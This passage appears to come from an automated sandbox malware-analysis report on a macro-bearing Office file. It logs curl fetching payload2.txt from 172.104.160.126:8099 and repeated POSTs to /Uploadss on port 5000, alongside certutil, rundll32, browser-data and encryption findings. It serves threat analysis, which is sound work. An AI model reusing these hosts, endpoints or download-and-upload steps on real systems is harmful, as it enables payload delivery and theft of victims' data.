Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49338
Source: global trafficTCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9dExpect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------727b88163de31621Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown | TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087D8C0 recv,WSAGetLastError,
Source: global traffic | HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /payload2.txt HTTP/1.1 Host: 172.104.160.126:8099 User-Agent: curl/7.83.1 Accept: */*
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe | String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: unknown | HTTP traffic detected: POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4722 Host: login.live.com
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr | String found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:5000/Upl
Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.bin | String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.bin | String found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xml | String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

System Summary

